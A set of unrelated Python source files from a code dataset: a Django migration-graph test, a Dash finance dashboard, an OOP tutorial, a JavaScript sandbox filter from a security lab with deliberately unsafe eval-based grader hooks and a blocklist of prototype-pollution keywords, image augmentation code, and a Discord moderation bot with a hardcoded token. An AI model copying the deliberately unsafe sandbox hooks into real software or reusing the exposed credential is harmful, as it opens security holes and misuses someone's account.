evolutions_app = get_app('evolutions_app')
evolutions_app2 = get_app('evolutions_app2')
evolution_deps_app = get_app('evolution_deps_app')
# evolutions_app
evolutions1 = [
Evolution(app_label='evolutions_app',
label='first_evolution'),
Evolution(app_label='evolutions_app',
label='second_evolution'),
]
models1 = [EvolutionsAppTestModel]
# evolutions_app2
evolutions2 = [
Evolution(app_label='evolutions_app2',
label='first_evolution'),
Evolution(app_label='evolutions_app2',
label='second_evolution'),
]
models2 = [EvolutionsApp2TestModel]
# evolution_deps_app
evolutions3 = [
Evolution(app_label='evolution_deps_app',
label='test_evolution'),
]
graph = EvolutionGraph()
graph.process_migration_deps = supports_migrations
if supports_migrations:
connection = connections[DEFAULT_DB_ALIAS]
migration_executor = MigrationExecutor(connection=connection)
migration_loader = MigrationLoader(connection=connection)
migration_plan = migration_executor.migration_plan([
('migrations_app', '0002_add_field'),
('migrations_app2', '0002_add_field'),
])
migration_loader.build_graph()
graph.add_migration_plan(migration_plan=migration_plan,
migration_graph=migration_loader.graph)
else:
migration_plan = None
graph.add_evolutions(app=evolutions_app,
evolutions=evolutions1,
new_models=models1)
graph.add_evolutions(app=evolutions_app2,
evolutions=evolutions2,
new_models=models2)
graph.add_evolutions(app=evolution_deps_app,
evolutions=evolutions3)
graph.finalize()
all_batches = list(graph.iter_batches())
if supports_migrations:
self.assertEqual(len(all_batches), 6)
excluded_migration_deps = set()
else:
self.assertEqual(len(all_batches), 4)
excluded_migration_deps = {
'migration:migrations_app:0001_initial',
'migration:migrations_app2:0002_add_field',
}
# Turn this back into a generator so we can more easily check these
# batches with/without migrations, depending on the version of Django
# the tests are being run on.
batches = iter(all_batches)
# Check the first migrations batch.
if supports_migrations:
node_type, nodes = next(batches)
self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_MIGRATION)
self.assertEqual(len(nodes), 3)
self._check_node(
nodes[0],
key='migration:migrations_app:0001_initial',
required_by={
'evolution:evolution_deps_app:test_evolution',
'migration:migrations_app:0002_add_field',
},
state={
'migration_plan_item': migration_plan[0],
'migration_target': ('migrations_app', '0001_initial'),
'type': EvolutionGraph.NODE_TYPE_MIGRATION,
})
self._check_node(
nodes[1],
key='migration:migrations_app:0002_add_field',
dependencies={
'migration:migrations_app:0001_initial',
},
required_by={
'migration:migrations_app2:0001_initial',
},
state={
'migration_plan_item': migration_plan[1],
'migration_target': ('migrations_app', '0002_add_field'),
'type': EvolutionGraph.NODE_TYPE_MIGRATION,
})
self._check_node(
nodes[2],
key='migration:migrations_app2:0001_initial',
dependencies={
'migration:migrations_app:0002_add_field',
},
required_by={
'migration:migrations_app2:0002_add_field',
},
state={
'migration_plan_item': migration_plan[2],
'migration_target': ('migrations_app2', '0001_initial'),
'type': EvolutionGraph.NODE_TYPE_MIGRATION,
})
# Check the first create-model batch.
node_type, nodes = next(batches)
self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_CREATE_MODEL)
self.assertEqual(len(nodes), 1)
self._check_node(
nodes[0],
key='create-model:evolutions_app:evolutionsapptestmodel',
dependencies={
'evolution:evolutions_app:__first__',
},
required_by={
'evolution:evolutions_app:first_evolution',
},
state={
'app': evolutions_app,
'model': EvolutionsAppTestModel,
'type': EvolutionGraph.NODE_TYPE_CREATE_MODEL,
})
# Check the first evolution batch.
node_type, nodes = next(batches)
self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_EVOLUTION)
self.assertEqual(len(nodes), 3)
self._check_node(
nodes[0],
key='evolution:evolutions_app:first_evolution',
dependencies={
'create-model:evolutions_app:evolutionsapptestmodel',
},
required_by={
'evolution:evolution_deps_app:test_evolution',
'evolution:evolutions_app:second_evolution',
},
state={
'app': evolutions_app,
'evolution': evolutions1[0],
'type': EvolutionGraph.NODE_TYPE_EVOLUTION,
})
self._check_node(
nodes[1],
key='evolution:evolutions_app:second_evolution',
dependencies={
'evolution:evolutions_app:first_evolution',
},
required_by={
'evolution:evolutions_app:__last__',
},
state={
'app': evolutions_app,
'evolution': evolutions1[1],
'type': EvolutionGraph.NODE_TYPE_EVOLUTION,
})
self._check_node(
nodes[2],
key='evolution:evolution_deps_app:test_evolution',
dependencies={
'evolution:evolution_deps_app:__first__',
'evolution:evolutions_app:first_evolution',
'evolution:evolutions_app:__last__',
'migration:migrations_app:0001_initial',
} - excluded_migration_deps,
required_by={
'evolution:evolution_deps_app:__last__',
'evolution:evolutions_app2:__first__',
'evolution:evolutions_app2:second_evolution',
'migration:migrations_app2:0002_add_field',
} - excluded_migration_deps,
state={
'app': evolution_deps_app,
'evolution': evolutions3[0],
'type': EvolutionGraph.NODE_TYPE_EVOLUTION,
})
if supports_migrations:
# Check the second migration batch.
node_type, nodes = next(batches)
self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_MIGRATION)
self.assertEqual(len(nodes), 1)
self._check_node(
nodes[0],
key='migration:migrations_app2:0002_add_field',
dependencies={
'evolution:evolution_deps_app:test_evolution',
'migration:migrations_app2:0001_initial',
},
state={
'migration_plan_item': migration_plan[3],
'migration_target': ('migrations_app2', '0002_add_field'),
'type': EvolutionGraph.NODE_TYPE_MIGRATION,
})
# Check the second create-model batch.
node_type, nodes = next(batches)
self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_CREATE_MODEL)
self.assertEqual(len(nodes), 1)
self._check_node(
nodes[0],
key='create-model:evolutions_app2:evolutionsapp2testmodel',
dependencies={
'evolution:evolutions_app2:__first__',
},
required_by={
'evolution:evolutions_app2:first_evolution',
},
state={
'app': evolutions_app2,
'model': EvolutionsApp2TestModel,
'type': EvolutionGraph.NODE_TYPE_CREATE_MODEL,
})
# Check the second evolution batch.
node_type, nodes = next(batches)
self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_EVOLUTION)
self.assertEqual(len(nodes), 2)
self._check_node(
nodes[0],
key='evolution:evolutions_app2:first_evolution',
dependencies={
'create-model:evolutions_app2:evolutionsapp2testmodel',
},
required_by={
'evolution:evolutions_app2:second_evolution',
},
state={
'app': evolutions_app2,
'evolution': evolutions2[0],
'type': EvolutionGraph.NODE_TYPE_EVOLUTION,
})
self._check_node(
nodes[1],
key='evolution:evolutions_app2:second_evolution',
dependencies={
'evolution:evolution_deps_app:test_evolution',
'evolution:evolutions_app2:first_evolution',
},
required_by={
'evolution:evolutions_app2:__last__',
},
state={
'app': evolutions_app2,
'evolution': evolutions2[1],
'type': EvolutionGraph.NODE_TYPE_EVOLUTION,
})
def _add_migrations(self, graph, migrations_info, leaf_migration_targets,
mark_applied=[]):
"""Add migrations to a graph.
This is a utility for simplifying the additions of a list of
migrations to a graph, handling the creation of the Django migration
objects, the formulation of a migration plan, and the recording of
applied migrations.
Args:
graph (django_evolution.utils.graph.EvolutionGraph):
The graph to add migrations to.
migrations_info (list of tuple):
The list of info on migrations to add. Each tuple contains:
1. The app label
2. The migration name
3. The migration class
leaf_migration_targets (list of tuple):
The list of final migration targets to migrate to.
mark_applied (list of tuple, optional):
The list of migration targets to mark as applied.
Returns:
list of tuple:
The migration plan generated from the migrations.
"""
migration_list = MigrationList()
for app_label, name, migration_cls in migrations_info:
migration_list.add_migration_info(
app_label=app_label,
name=name,
migration=migration_cls(name, app_label))
connection = connections[DEFAULT_DB_ALIAS]
if mark_applied:
mark_applied_list = MigrationList()
mark_applied_list.add_migration_targets(mark_applied)
record_applied_migrations(connection, mark_applied_list)
else:
mark_applied_list = None
migration_executor = MigrationExecutor(
connection=connection,
custom_migrations=migration_list)
migration_loader = MigrationLoader(
connection=connection,
custom_migrations=migration_list)
migration_plan = \
migration_executor.migration_plan(leaf_migration_targets)
migration_loader.build_graph()
graph.add_migration_plan(migration_plan=migration_plan,
migration_graph=migration_loader.graph)
if mark_applied_list:
graph.mark_migrations_applied(mark_applied_list)
return migration_plan
def _check_node(self, node, key, insert_index=None, dependencies=set(),
required_by=set(), state={}):
"""Check a graph node for validity.
This will assert if any of the provided arguments don't match the
node.
Args:
node (django_evolution.utils.graph.Node):
The graph node to check.
key (unicode):
The expected node key.
insert_index (int, optional):
The expected insert index. If not provided, this won't be
checked.
dependencies (set, optional):
The node keys expected as dependencies.
required_by (set, optional):
The node keys expected to require this node.
state (dict, optional):
The expected state of the node.
Raises:
AssertionError:
The node did not match the expected arguments.
"""
self.assertEqual(node.key, key)
self.assertEqual(node.state, state)
self.assertEqual({_node.key for _node in node.dependencies},
dependencies)
self.assertEqual({_node.key for _node in node.required_by},
required_by)
if insert_index is not None:
self.assertEqual(node.insert_index, insert_index)
| [
"christian@beanbaginc.com"
] | christian@beanbaginc.com |
5c1af70eb8f9c878ff51c045769f6b423b061baa | 0dde244a6e4ebbf255d1e9d0e98ac66fce1f06cd | /src/ui/overview.py | 02629a0576d5ad304a2594094c38836a09312745 | [] | no_license | uridanan/Mint | dabe1ded7b3ab57cb5dd9761fcc5f69267d5cff7 | 5b6a8ee12aff798b6d7f5ba0e7baa49bd9a8f7f6 | refs/heads/master | 2020-03-20T07:11:26.514511 | 2019-11-05T21:40:14 | 2019-11-05T21:40:14 | 137,273,586 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,895 | py | import dash_core_components as dcc
import dash_html_components as html
import src.db.dbAccess as db
from dash.dependencies import Input, Output
import plotly.graph_objs as go
from src.app import app
from src.ui.timeseries import *
from src.sessions.globals import session
#TODO Change the report to the data presented in the graphs
#https://plot.ly/python/time-series/
#TODO Look at morning star tickers for proper time series?
#https://dash.plot.ly/gallery
#https://dash.plot.ly/dash-core-components/tabs
#TODO: Format fields per data type
#TODO: Make the table scrollable (use my own CSS)
#TODO: use range slider for date span and upload component for file import https://dash.plot.ly/dash-core-components
#TODO: manage categories form: create categories and assign businesses to them
#TODO: think of suggesting categories based on classification by others, but each uesr gets to assign businesses as they like
#TODO: add range slider to select dates range
#TODO: start marking recurring expenses
#TODO: import the rest of the credit cards
#TODO: rename expense (save the new name, re-use when recurring)
#TODO: show credit (income) report
#TODO: use upload component to upload files
#TODO: Format using the example "Label Lines with Annotations" from https://plot.ly/python/line-charts/
#TODO: add name for undefined
def generateTimeSeries(categories,dataFrame):
#df = pd.read_csv("https://raw.githubusercontent.com/plotly/datasets/master/finance-charts-apple.csv")
timeSeries = TimeSeriesData(dataFrame)
data = []
for c in categories:
trace = go.Scatter(
x=timeSeries.getDates(),
y=timeSeries.getSeriesByName(c),
name = c,
#line = dict(color = '#17BECF'),
opacity = 0.8)
data.append(trace)
layout = dict(
title = "Expenses by category over time",
xaxis = dict(title='Month'),
yaxis=dict(title='Expenses')
)
figure = dict(data=data, layout=layout)
return figure
def testFigure():
# Add data
month = ['January', 'February', 'March', 'April', 'May', 'June', 'July',
'August', 'September', 'October', 'November', 'December']
high_2000 = [32.5, 37.6, 49.9, 53.0, 69.1, 75.4, 76.5, 76.6, 70.7, 60.6, 45.1, 29.3]
low_2000 = [13.8, 22.3, 32.5, 37.2, 49.9, 56.1, 57.7, 58.3, 51.2, 42.8, 31.6, 15.9]
high_2007 = [36.5, 26.6, 43.6, 52.3, 71.5, 81.4, 80.5, 82.2, 76.0, 67.3, 46.1, 35.0]
low_2007 = [23.6, 14.0, 27.0, 36.8, 47.6, 57.7, 58.9, 61.2, 53.3, 48.5, 31.0, 23.6]
high_2014 = [28.8, 28.5, 37.0, 56.8, 69.7, 79.7, 78.5, 77.8, 74.1, 62.6, 45.3, 39.9]
low_2014 = [12.7, 14.3, 18.6, 35.5, 49.9, 58.0, 60.0, 58.6, 51.7, 45.2, 32.2, 29.1]
# Create and style traces
trace0 = go.Scatter(
x=month,
y=high_2014,
name='High 2014',
line=dict(color=('rgb(205, 12, 24)'),
width=4)
)
trace1 = go.Scatter(
x=month,
y=low_2014,
name='Low 2014',
line=dict(
color=('rgb(22, 96, 167)'),
width=4, )
)
trace2 = go.Scatter(
x=month,
y=high_2007,
name='High 2007',
line=dict(
color=('rgb(205, 12, 24)'),
width=4,
dash='dash') # dash options include 'dash', 'dot', and 'dashdot'
)
trace3 = go.Scatter(
x=month,
y=low_2007,
name='Low 2007',
line=dict(
color=('rgb(22, 96, 167)'),
width=4,
dash='dash')
)
trace4 = go.Scatter(
x=month,
y=high_2000,
name='High 2000',
line=dict(
color=('rgb(205, 12, 24)'),
width=4,
dash='dot')
)
trace5 = go.Scatter(
x=month,
y=low_2000,
name='Low 2000',
line=dict(
color=('rgb(22, 96, 167)'),
width=4,
dash='dot')
)
data = [trace0, trace1, trace2, trace3, trace4, trace5]
# Edit the layout
layout = dict(title='Average High and Low Temperatures in New York',
xaxis=dict(title='Month'),
yaxis=dict(title='Temperature (degrees F)'),
)
fig = dict(data=data, layout=layout)
return fig
#Try an iplot instead
#https://plot.ly/python/table/
def generateTable(dataframe, max_rows=200):
return html.Table(
# Header
[html.Tr([html.Th(col) for col in dataframe.columns])] +
# Body
[html.Tr([
html.Td(dataframe.iloc[i][col]) for col in dataframe.columns
]) for i in range(min(len(dataframe), max_rows))]
)
def generateBarGraph(data, xName, yNames, names):
return {
'data': [
{'x': data[xName], 'y': data[yNames[i]], 'type': 'bar', 'name': names[i]} for i in range(0,(len(yNames)))
]
}
F_BALANCE = 'queries/queryBalanceReport.sql'
F_SAVINGS = 'queries/querySavingsReport.sql'
F_GETCATEGORIES = 'queries/queryCategoryFilter.sql'
F_CATEGORIESOVERTIME = 'queries/queryExpensesByCategoryOverTime.sql'
def getCategories():
df = db.runQueryFromFile(F_GETCATEGORIES, session.getUserIdParam())
list = [v[0] for v in df.values]
return list
#categories = getCategories()
layout = html.Div(children=[
html.H4(id='title', children='Bank Report - Work In Pogress'),
dcc.Tabs(id="tabs", value='tab1', children=[
dcc.Tab(label='Balance', value='tab1'),
dcc.Tab(label='Savings', value='tab2'),
dcc.Tab(label='IncomeVSExpenses', value='tab3')
]),
html.Div(id='tabsContent'),
dcc.Graph(id='byCategory')
])
@app.callback(Output('byCategory', 'figure'),
[Input('title', 'children')])
def updateCategoriesGraph(title):
categoriesData = db.runQueryFromFile(F_CATEGORIESOVERTIME, session.getUserIdParam())
return generateTimeSeries(getCategories(), categoriesData)
@app.callback(Output('tabsContent', 'children'),
[Input('tabs', 'value')])
def render_content(tab):
balanceData = db.runQueryFromFile(F_BALANCE, session.getUserIdParam())
savingsData = db.runQueryFromFile(F_SAVINGS, session.getUserIdParam())
if tab == 'tab1':
return html.Div([
html.H3('Balance over time'),
dcc.Graph(id='balance-graph', figure=generateBarGraph(balanceData, "monthname", ["balance"], ["Balance"]))
])
elif tab == 'tab2':
return html.Div([
html.H3('Savings over time'),
dcc.Graph(id='savings-graph', figure=generateBarGraph(savingsData, "monthname", ["savings"], ["Savings"]))
])
elif tab == 'tab3':
return html.Div([
html.H3('Savings over time'),
dcc.Graph(id='income-graph',
figure=generateBarGraph(savingsData, "monthname", ["monthlycredit", "monthlydebit"],["Income", "Expenses"]))
])
| [
"uridanan@gmail.com"
] | uridanan@gmail.com |
2e43ad66add5cc370ee3dc18b1754c8d45d8b1fe | 31eaed64b0caeda5c5fe3603609402034e6eb7be | /ignorancia_zero/iz_aula-064 - programação orientada a objetos.py | e7aa8a74376c2e9fbd0ede1bee421dec1ba61654 | [] | no_license | RaphaelfsOliveira/workspace_python | 93657b581043176ecffb5783de208c0a00924832 | 90959697687b9398cc48146461750942802933b3 | refs/heads/master | 2021-01-11T17:39:49.574875 | 2017-06-28T20:55:43 | 2017-06-28T20:55:43 | 79,814,783 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,418 | py | # metodo especial construtor de objeto
# instancia o objeto
'__init__'
# devolve o objeto no formato de um dicionario
'__dict__'
# transforma o objeto em string, tem sempre que retornar uma string
'__str__'
# faz operações com outra instancia do objeto somente com sinal + - / *
'__add__'
#imprime na tela a documentação escrita na classe do objeto instanciado
'__doc__'
class Conta(object):
'''O Objeto conta representa uma conta de banco'''
def __init__(self, ID, saldo):
'''metodo construtor do objeto'''
self.ID = ID
self.saldo = saldo
def __str__(self):
'''transforma o objeto em string'''
return 'ID: %d\nSaldo R$: %.2f' %(self.ID, self.saldo)
def __add__(self, outro):
'''faz operações com outra instancia do objeto somente com sinal + - / *'''
self.saldo += outro.saldo
def __call__(self, x):
'''torna o objeto chamavel para realizar alguma operação'''
return x
bra = Conta(123, 5000)
ita = Conta(456, 8000)
print(bra.__dict__, '__dict__ devolve o objeto como dicionario')
print(bra.__doc__, '__doc__ documentação da classe do objeto')
'''
>>> class Pai:
pass
>>> class Filho(Pai):
pass
>>> class Neto(Filho):
pass
>>> issubclass(Pai, Filho)
False
>>> issubclass(Filho, Pai)
True
>>> Filho.__bases__
(<class '__main__.Pai'>,)
>>> Neto.__bases__
(<class '__main__.Filho'>,)
'''
| [
"raphaelbrf@gmail.com"
] | raphaelbrf@gmail.com |
21d5d25107671e5c852f9645f6c319c98f3cabca | 32fff3cac41691e7ef76bd48d575c74e7102e861 | /Lab6/htmlfilter.py | b838656b8ff34f2e189a5da93ec40aafa495ded4 | [] | no_license | ukk1/ITKST53 | 6afbe31ebf014033829e874f912bb7fa359fd3f2 | 20f3509807fc557e9564193f2822f2bbe64714fa | refs/heads/master | 2020-04-06T07:10:50.969155 | 2016-08-31T16:28:57 | 2016-08-31T16:28:57 | 60,543,895 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,338 | py | import lxml.html
import lxml.html.clean
import slimit.ast
import slimit.parser
import lab6visitor
from debug import *
libcode = '''
<script>
var sandbox_document = {
getElementById: function(id) {
var e = document.getElementById('sandbox-' + id);
return {
get onclick() { return e.onclick; },
set onclick(h) { e.onclick = h; },
get textContent() { return e.textContent; },
set textContent(h) { e.textContent = h; },
}
},
};
// Do not change these functions.
function sandbox_grader(url) {
window.location = url;
}
function sandbox_grader2() {
eval("1 + 1".toString()); // What could possibly go wrong...
}
function sandbox_grader3() {
try {
eval(its_okay_no_one_will_ever_define_this_variable);
} catch (e) {
}
}
function sandbox_setTimeout(s, sec) {
if (typeof s == "function") {
t = eval(s);
setTimeout(t, sec);
}
}
function includes(k) {
for(var i=0; i < this.length; i++){
if( this[i] === k || ( this[i] !== this[i] && k !== k ) ){
return true;
}
}
return false;
}
var badwords = ["__proto__", "constructor", "__defineGetter__", "__defineSetter__"];
badwords.includes = includes;
function badword_check(s) {
if (badwords.includes(s)) {
return '__invalid__';
}
return s;
}
function this_check(s) {
if (s === window) return null;
return s;
}
</script>
'''
def filter_html_cb(s, jsrewrite):
cleaner = lxml.html.clean.Cleaner()
cleaner.scripts = False
cleaner.style = True
doc = lxml.html.fromstring(s)
clean = cleaner.clean_html(doc)
for el in clean.iter():
if el.tag == 'script':
el.text = jsrewrite(el.text)
for a in el.attrib:
del el.attrib[a]
if 'id' in el.attrib:
el.attrib['id'] = 'sandbox-' + el.attrib['id']
return lxml.html.tostring(clean)
@catch_err
def filter_js(s):
parser = slimit.parser.Parser()
tree = parser.parse(s)
visitor = lab6visitor.LabVisitor()
return visitor.visit(tree)
@catch_err
def filter_html(s):
return libcode + filter_html_cb(s, filter_js)
| [
"bldr86@gmail.com"
] | bldr86@gmail.com |
bfb960beefa750bcc845e2efc49507af9740647a | 52a61caff0aeb434c32e5657e38762643e9f57dd | /DataStructuresAndAlgorithms/SearchAndSort/Search/BinarySearch/functionBinarySearch.py | 6a7e15608caca8460acd2988b9f9a53c5f770492 | [] | no_license | AndrewErmakov/PythonTrainingBasics | 1480a6378d1ec59884760e2b3014ccc3d28f058f | 639e15bbfc54da762cb9e366497754cfece30691 | refs/heads/master | 2021-06-10T15:57:58.682335 | 2021-03-25T13:37:30 | 2021-03-25T13:37:30 | 153,678,760 | 0 | 0 | null | 2018-10-30T13:52:51 | 2018-10-18T19:45:47 | Python | UTF-8 | Python | false | false | 596 | py | def binary_search(list_num: list, number: int) -> int:
"""Выводит индекс значения, которое мы ищем, иначе выводится НЕ НАЙДЕНО"""
low_border = 0
high_border = len(list_num) - 1
while low_border <= high_border:
mid = low_border + (high_border - low_border) // 2
guess = list_num[mid]
if guess == number:
return mid
if guess > number:
high_border = mid - 1
else:
low_border = mid + 1
return None
print(binary_search([1, 3, 5, 7, 9], 3))
| [
"andrew.67@list.ru"
] | andrew.67@list.ru |
b3e4aaa0bed41cbfe87730b8ee3df312b46f9aba | b590cf6a5c1fffd9c05a6d27462b472854b93fe6 | /utils/transformations.py | 45d7478a7130343949d498d5c301ac1acf31fbb4 | [
"MIT"
] | permissive | CarolMazini/Manifold-Learning-for-Real-World-Event-Understanding | 344f4e01438570ab710e1e1dc187386f20072d94 | 36151165f0ce23c168b893a9e916023b34630cf3 | refs/heads/main | 2023-04-15T13:52:01.063661 | 2021-04-16T08:49:41 | 2021-04-16T08:49:41 | 350,513,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,789 | py | from tqdm import tqdm
import time
import numpy as np
import scipy as sc
from sys import argv
import math
from sklearn import metrics
import shutil
import random
from PIL import Image
import PIL
import cv2
import os
import imutils
#performs randomly rotations according to a maximum angle for both sides
def random_rotate_images(image, angle_max):
'''
input: image to be rotated, maximum angle to perform rotation (both sides)
output: rotated image, angle of rotation
'''
angle = random.randint(-angle_max, angle_max)
rot = imutils.rotate(image, angle=angle)
return rot, angle
#performs random zoom in
def random_zoom(cv2Object, zoom_size_max):
'''
input: image as an cv2 object, maximum zoom
output: image with zoom in, zoom value
'''
zoomSize = random.uniform(1.0, zoom_size_max)
# Resizes the image/video frame to the specified amount of "zoomSize".
# A zoomSize of "2", for example, will double the canvas size
cv2Object = imutils.resize(cv2Object, width=int(zoomSize * cv2Object.shape[1]))
# center is simply half of the height & width (y/2,x/2)
center = (cv2Object.shape[0]//2,cv2Object.shape[1]//2)
# cropScale represents the top left corner of the cropped frame (y/x)
cropScale = (int(center[0]/zoomSize), int(center[1]/zoomSize))
# The image/video frame is cropped to the center with a size of the original picture
# image[y1:y2,x1:x2] is used to iterate and grab a portion of an image
# (y1,x1) is the top left corner and (y2,x1) is the bottom right corner of new cropped frame.
cv2Object = cv2Object[cropScale[0]:(center[0] + cropScale[0]), cropScale[1]:(center[1] + cropScale[1])]
return cv2Object, zoomSize
#performs random crop according to a specified size
def random_crop(img, random_crop_size):
'''
input: image to be cropped, expected size to crop
output: cropped image
'''
# Note: image_data_format is 'channel_last'
assert img.shape[2] == 3
height, width = img.shape[0], img.shape[1]
dy, dx = random_crop_size
x = random.randint(0, width - dx + 1)
y = random.randint(0, height - dy + 1)
img = img.astype(np.float)
return img[y:(y+dy), x:(x+dx), :], x, y
#read images from a list of filenames, crop images size and save in a directory
def crop_generator(images, crop_length, name_base):
'''
input: list of image filenames to be cropped, size of the expected crop, name_base of the save directory
output: ---
'''
"""Take as input a Keras ImageGen (Iterator) and generate random
crops from the image batches generated by the original iterator.
"""
for filename in images:
image = cv2.imread(filename)
try:
height, width = image.shape[0], image.shape[1]
crop_height = height//2
crop_width = width//2
img, x, y = random_crop(image, (crop_height, crop_width))
# save a image using extension
filename = filename.split('/')[-2]+'-'+filename.split('/')[-1]
print(name_base + 'cropped'+filename.split('.')[0]+'-'+str(x)+'-'+str(y)+'.png')
cv2.imwrite(name_base + 'cropped'+filename.split('.')[0]+'-'+str(x)+'-'+str(y)+'.png',img)
except:
pass
#read images from a list of filenames, zoom in images maximum and save in a directory
def zoom_generator(images, zoom_size_max, name_base):
'''
input: list of image filenames to be zoom in, size of the expected zoom in, name_base of the save directory
output: ---
'''
for filename in images:
image = cv2.imread(filename)
try:
img,x = random_zoom(image, zoom_size_max)
# save a image using extension
filename = filename.split('/')[-2]+'-'+filename.split('/')[-1]
print(name_base + 'zoomIn'+filename.split('.')[0]+'-'+str(x)+'.png')
cv2.imwrite(name_base + 'zoomIn'+filename.split('.')[0]+'-'+str(x)+'.png',img)
except:
pass
#read images from a list of filenames, angle rotation images maximum and save in a directory
def rotation_generator(images, angle_max, name_base):
'''
input: list of image filenames to be zoom in, size of the expected zoom in, name_base of the save directory
output: ---
'''
for filename in images:
image = cv2.imread(filename)
try:
img, x = random_rotate_images(image, angle_max)
# save a image using extension
filename = filename.split('/')[-2]+'-'+filename.split('/')[-1]
print(name_base + 'rotated'+filename.split('.')[0]+'-'+str(x)+'.png')
cv2.imwrite(name_base + 'rotated'+filename.split('.')[0]+'-'+str(x)+'.png',img)
except:
pass | [
"carolinemazinirodrigues@hotmail.com"
] | carolinemazinirodrigues@hotmail.com |
00897337ef29542e1c4328ecc6528ae53b6c399f | de9da1acee9c6b7e899efe8adf83ae0b29fc2ad3 | /src/run.py | 1521c7d5049b918c40431f9348d2f844f6d32c50 | [
"MIT"
] | permissive | CristianContrera95/FaceDetectAPI | 646518cbc1d24898904a723a7333f6a27edacb0b | 49cc896e8eddbf26b406d75325f9b38dba532e2b | refs/heads/master | 2022-12-09T20:26:15.448061 | 2020-08-27T13:48:03 | 2020-08-27T13:48:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | py | from app import app
from config import ENVIRONMENT, PORT
if __name__ == '__main__':
if ENVIRONMENT == 'dev':
app.run(host='0.0.0.0', port=PORT, debug=True)
else:
app.run(host='0.0.0.0', port=PORT, debug=False)
| [
"cristiancontrera95@gmail.com"
] | cristiancontrera95@gmail.com |
06b82317f341de041aa076425ac0ea6a0b157357 | fdb9b553a23647f7ea06f690613707c40b54902f | /src/main/resources/resource/LocalSpeech/LocalSpeech.py | 3c699a5680887399d9993fd401bcfa08d5ebce64 | [
"CC-BY-2.5",
"Apache-2.0"
] | permissive | ShaunHolt/myrobotlab | d8d9f94e90457474cf363d36f4a45d396cfae900 | 92046d77abd560f0203050b3cccb21aa9df467f2 | refs/heads/develop | 2021-07-08T04:55:01.462116 | 2020-04-18T19:58:17 | 2020-04-18T19:58:17 | 122,795,957 | 0 | 0 | Apache-2.0 | 2020-04-18T19:58:18 | 2018-02-25T01:37:54 | Java | UTF-8 | Python | false | false | 886 | py | #########################################
# LocalSpeech.py
# description: used as a general template
# categories: speech
# more info @: http://myrobotlab.org/service/LocalSpeech
#########################################
# start the service
mouth = Runtime.start('mouth','LocalSpeech')
#possible voices ( selected voice is stored inside config until you change it )
print ("these are the voices I can have", mouth.getVoices())
print ("this is the voice I am using", mouth.getVoice())
# ( macOs )
# set your voice from macos control panel
# you can test it using say command from terminal
# mouth.setVoice("Microsoft Zira Desktop - English (United States)")
mouth.speakBlocking(u"Hello this is an english voice")
mouth.speakBlocking(u"Bonjour ceci est une voix française, je teste les accents aussi avec le mot éléphant")
mouth.setVolume(0.7)
mouth.speakBlocking("Silent please") | [
"grog@myrobotlab.org"
] | grog@myrobotlab.org |
eecfd2976b90f621a274ce0bcb1917b8a3f72bb2 | 8a91561ea2f82376f653a001f642d1a32234b6d0 | /bot.py | c7683d20b5701a5c577bd77ddc77720c37529f60 | [] | no_license | SumitKumar1307/Lightning | 8cf6adfbc5c264c6e86de7fb2c84a333b3873cbd | 7052948c77381b0209865758f33f45ddb48f39fd | refs/heads/main | 2023-02-23T16:01:58.518177 | 2021-01-25T11:35:10 | 2021-01-25T11:35:10 | 332,725,897 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,692 | py | import discord
intents = discord.Intents.default()
intents.members = True
client = discord.Client(intents=intents)
@client.event
async def on_ready():
print(f"{client.user} connected to Discord")
@client.event
async def on_member_remove(member):
print("Someone left")
member_name = str(member)
member_name = member_name[:member_name.index("#")]
embed = discord.Embed(title=f"{member_name} Left!", description=f"We're sorry to say good bye, hope"
f" we will see you soon"
f" {member.mention}")
channel = client.get_channel(802143961031507968)
await channel.send(embed=embed)
@client.event
async def on_member_join(member):
member_name = str(member)
member_name = member_name[:member_name.index("#")]
print("Someone joined")
channel = client.get_channel(797412497589927937)
embed = discord.Embed(title=f"Welcome {member_name}",
description=f"Welcome {member_name}, hope you will have a nice"
" time will you're here")
await channel.send(embed=embed)
@client.event
async def on_message(message):
message_content = str(message.content)
restricted_words = ['fuck', 'dick', 'ass', 'motherfucker', 'pussy', 'moron', 'bitch']
for restricted_word in restricted_words:
if restricted_word in message_content.lower():
embed = discord.Embed(title="Message Removal", description=f"Hey {message.author.mention}, I wanted to let"
f" you know you know that your message has been"
f" removed because of use of inappropriate words"
f". If you think that this was a mistake please"
f" contact the administrators of the server.")
await message.author.send(embed=embed)
await message.delete()
else:
if message_content.startswith("!"):
if message_content == "!hello":
await message.channel.send(f"Hey {message.author.mention}")
elif message_content == "!my_messages":
no_of_messages = 0
async for msg in client.get_channel(message.channel.id).history():
if msg.author == message.author:
print(msg.content)
no_of_messages += 1
embed = discord.Embed(title="Number of Messages", description=f"Hey {message.author.mention}, "
f"According to our records you have sent a"
f" total of {no_of_messages} to this channel")
await message.channel.send(embed=embed)
if message_content == "!latest_events":
events_channel = client.get_channel(802144608464404520)
async for msg in events_channel.history():
if msg.embeds:
await message.channel.send(embed=msg.embeds[0])
break
else:
await message.channel.send(msg.content)
break
client.run("ODAyNDU1NzIxMjQ0MzYwNzI1.YAvfIA.OGZv2fkku8Z88Ny_bQ6XL6pmmXM")
| [
"noreply@github.com"
] | SumitKumar1307.noreply@github.com |
8dbc45ff6c19e23b02c3d083b54c1e91f05af6d0 | 10abbbca6e0f3f0939bef436b41dfd1511c9480b | /post/views.py | 6b9883dff1390cfeefe5bd853589ead2bd367751 | [] | no_license | TrellixVulnTeam/blog_QJAD | 727f306001abe083c98a5c10277a1158170d61dd | d061442d41b985df11e6c6eac4e602818c0f9443 | refs/heads/master | 2023-03-17T12:50:38.497215 | 2019-02-21T15:12:45 | 2019-02-21T15:12:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,867 | py | # -*- encoding: utf-8 -*-
from django.shortcuts import render, HttpResponse, get_object_or_404, HttpResponseRedirect, redirect, Http404
from .models import Post
from .forms import PostForm, CommentForm
from django.contrib import messages
